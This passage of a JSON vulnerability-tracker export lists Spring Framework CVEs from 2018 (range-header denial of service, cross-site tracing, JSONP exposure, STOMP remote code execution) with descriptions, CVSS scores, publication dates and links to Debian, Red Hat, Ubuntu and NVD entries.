returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-10-18T22:29:00", "type": "debiancve", "title": "CVE-2018-15756", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2018-10-18T22:29:00", "id": "DEBIANCVE:CVE-2018-15756", "href": "https://security-tracker.debian.org/tracker/CVE-2018-15756", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-10T06:09:35", "description": "Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-25T15:29:00", "type": "debiancve", "title": "CVE-2018-11039", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11039"], "modified": "2018-06-25T15:29:00", "id": "DEBIANCVE:CVE-2018-11039", "href": "https://security-tracker.debian.org/tracker/CVE-2018-11039", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-10T06:09:35", "description": "Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the \"jsonp\" and \"callback\" JSONP parameters, enabling cross-domain requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-25T15:29:00", "type": "debiancve", "title": "CVE-2018-11040", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11040"], "modified": "2018-06-25T15:29:00", "id": "DEBIANCVE:CVE-2018-11040", "href": "https://security-tracker.debian.org/tracker/CVE-2018-11040", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-10T06:09:35", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-06T13:29:00", "type": "debiancve", "title": "CVE-2018-1270", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270"], "modified": "2018-04-06T13:29:00", "id": "DEBIANCVE:CVE-2018-1270", "href": "https://security-tracker.debian.org/tracker/CVE-2018-1270", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-10T06:09:35", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.16 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. This CVE addresses the partial fix for CVE-2018-1270 in the 4.3.x branch of the Spring Framework.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-11T13:29:00", "type": "debiancve", "title": "CVE-2018-1275", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270", "CVE-2018-1275"], "modified": "2018-04-11T13:29:00", "id": "DEBIANCVE:CVE-2018-1275", "href": "https://security-tracker.debian.org/tracker/CVE-2018-1275", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-03-08T20:25:04", "description": "Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-10-25T12:49:01", "type": "redhatcve", "title": "CVE-2018-15756", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2023-03-08T18:25:35", "id": "RH:CVE-2018-15756", "href": "https://access.redhat.com/security/cve/cve-2018-15756", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-07T23:25:19", "description": "Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack.\n#### Mitigation\n\nAccording to the upstream advisory, this attack applies to applications that allow the application server to handle HTTP TRACE requests, and use the HiddenHttpMethodFilter. Note that in the HiddenHttpMethodFilter is enabled by default in Spring Boot. \n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-10-17T04:49:30", "type": "redhatcve", "title": "CVE-2018-11039", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11039"], "modified": "2023-03-07T22:06:55", "id": "RH:CVE-2018-11039", "href": "https://access.redhat.com/security/cve/cve-2018-11039", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-07T23:25:21", "description": "Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the \"jsonp\" and \"callback\" JSONP parameters, enabling cross-domain requests.\n#### Mitigation\n\nAccording to the upstream advisory, this vulnerability only applies to applications that do all of the following: \n\n\n * Explicitly configure MappingJackson2JsonView. \n * Do not set the jsonpParameterNames property of MappingJackson2JsonView to an empty set. \n * Expose sensitive user information over endpoints that can render content with JSONP. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-10-17T04:50:03", "type": "redhatcve", "title": "CVE-2018-11040", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11040"], "modified": "2023-03-07T22:07:02", "id": "RH:CVE-2018-11040", "href": "https://access.redhat.com/security/cve/cve-2018-11040", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-01T05:23:03", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-06T08:18:54", "type": "redhatcve", "title": "CVE-2018-1270", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270"], "modified": "2023-02-01T02:52:55", "id": "RH:CVE-2018-1270", "href": "https://access.redhat.com/security/cve/cve-2018-1270", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-01T05:23:01", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.16 and older unsupported versions, allow applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a remote code execution attack. This CVE addresses the partial fix for CVE-2018-1270 in the 4.3.x branch of the Spring Framework.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-09T20:20:44", "type": "redhatcve", "title": "CVE-2018-1275", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270", "CVE-2018-1275"], "modified": "2023-02-01T02:53:15", "id": "RH:CVE-2018-1275", "href": "https://access.redhat.com/security/cve/cve-2018-1275", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-01-27T14:04:17", "description": "Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions\n4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch\nprovide support for range requests when serving static resources through\nthe ResourceHttpRequestHandler, or starting in 5.0 when an annotated\ncontroller returns an org.springframework.core.io.Resource. A malicious\nuser (or attacker) can add a range header with a high number of ranges, or\nwith wide ranges that overlap, or both, for a denial of service attack.\nThis vulnerability affects applications that depend on either spring-webmvc\nor spring-webflux. Such applications must also have a registration for\nserving static resources (e.g. JS, CSS, images, and others), or have an\nannotated controller that returns an org.springframework.core.io.Resource.\nSpring Boot applications that depend on spring-boot-starter-web or\nspring-boot-starter-webflux are ready to serve static resources out of the\nbox and are therefore vulnerable.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=911786>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-10-18T00:00:00", "type": "ubuntucve", "title": "CVE-2018-15756", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2018-10-18T00:00:00", "id": "UB:CVE-2018-15756", "href": "https://ubuntu.com/security/CVE-2018-15756", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-27T14:08:53", "description": "Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to\n4.3.18, and older unsupported versions) allow web applications to change\nthe HTTP request method to any HTTP method (including TRACE) using the\nHiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing\nXSS vulnerability, a malicious user (or attacker) can use this filter to\nescalate to an XST (Cross Site Tracing) attack.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-25T00:00:00", "type": "ubuntucve", "title": "CVE-2018-11039", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11039"], "modified": "2018-06-25T00:00:00", "id": "UB:CVE-2018-11039", "href": "https://ubuntu.com/security/CVE-2018-11039", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-01-27T14:08:52", "description": "Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18\nand older unsupported versions, allows web applications to enable\ncross-domain requests via JSONP (JSON with Padding) through\nAbstractJsonpResponseBodyAdvice for REST controllers and\nMappingJackson2JsonView for browser requests. Both are not enabled by\ndefault in Spring Framework nor Spring Boot, however, when\nMappingJackson2JsonView is configured in an application, JSONP support is\nautomatically ready to use through the \"jsonp\" and \"callback\" JSONP\nparameters, enabling cross-domain requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-25T00:00:00", "type": "ubuntucve", "title": "CVE-2018-11040", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11040"], "modified": "2018-06-25T00:00:00", "id": "UB:CVE-2018-11040", "href": "https://ubuntu.com/security/CVE-2018-11040", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:50:47", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to\n4.3.15 and older unsupported versions, allow applications to expose STOMP\nover WebSocket endpoints with a simple, in-memory STOMP broker through the\nspring-messaging module. A malicious user (or attacker) can craft a message\nto the broker that can lead to a remote code execution attack.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895114>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-06T00:00:00", "type": "ubuntucve", "title": "CVE-2018-1270", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270"], "modified": "2018-04-06T00:00:00", "id": "UB:CVE-2018-1270", "href": "https://ubuntu.com/security/CVE-2018-1270", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T13:50:42", "description": "Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to\n4.3.16 and older unsupported versions, allow applications to expose STOMP\nover WebSocket endpoints with a simple, in-memory STOMP broker through the\nspring-messaging module. A malicious user (or attacker) can craft a message\nto the broker that can lead to a remote code execution attack. This CVE\naddresses the partial fix for CVE-2018-1270 in the 4.3.x branch of the\nSpring Framework.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-11T00:00:00", "type": "ubuntucve", "title": "CVE-2018-1275", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1270", "CVE-2018-1275"], "modified": "2018-04-11T00:00:00", "id": "UB:CVE-2018-1275", "href": "https://ubuntu.com/security/CVE-2018-1275", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-02-09T14:13:05", "description": "Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-10-18T22:29:00", "type": "cve", "title": "CVE-2018-15756", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15756"], "modified": "2022-05-13T20:56:00", "cpe": ["cpe:/a:oracle:retail_invoice_matching:13.0", 